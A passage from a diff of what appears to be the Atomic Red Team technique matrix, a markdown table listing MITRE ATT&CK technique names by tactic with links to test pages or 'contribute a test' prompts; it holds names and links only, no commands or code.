TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DCSync](../../T1003.006/T1003.006.md) | [Local Account](../../T1087.001/T1087.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Python](../../T1059.006/T1059.006.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | -| | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | -| | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | -| | [Systemd Timers](../../T1053.006/T1053.006.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | [Unix Shell](../../T1059.004/T1059.004.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | [Visual Basic](../../T1059.005/T1059.005.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Service Discovery](../../T1007/T1007.md) | | [Screen Capture](../../T1113/T1113.md) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | [Windows Command Shell](../../T1059.003/T1059.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | [Windows Management Instrumentation](../../T1047/T1047.md) | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Cracking](../../T1110.002/T1110.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Remote Access Software](../../T1219/T1219.md) | | -| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Standard Encoding](../../T1132.001/T1132.001.md) | | -| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [External Remote Services](../../T1133/T1133.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | | -| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | -| | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Local Accounts](../../T1078.003/T1078.003.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | | -| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | | -| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | | -| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hide Artifacts](../../T1564/T1564.md) | | | | | | | | -| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Office Application Startup](../../T1137/T1137.md) | [Port Monitors](../../T1547.010/T1547.010.md) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | | -| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | -| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | -| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | -| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | -| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Rc.common](../../T1037.004/T1037.004.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | | -| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | | -| | | [Port Monitors](../../T1547.010/T1547.010.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | -| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | -| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | -| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | -| | | [Rc.common](../../T1037.004/T1037.004.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | | -| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | | -| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Systemd Service](../../T1543.002/T1543.002.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | | -| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | | -| | | [Screensaver](../../T1546.002/T1546.002.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | | -| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Trap](../../T1546.005/T1546.005.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | -| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | | -| | | [Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | | -| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | | -| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | | -| | | [Systemd Timers](../../T1053.006/T1053.006.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous 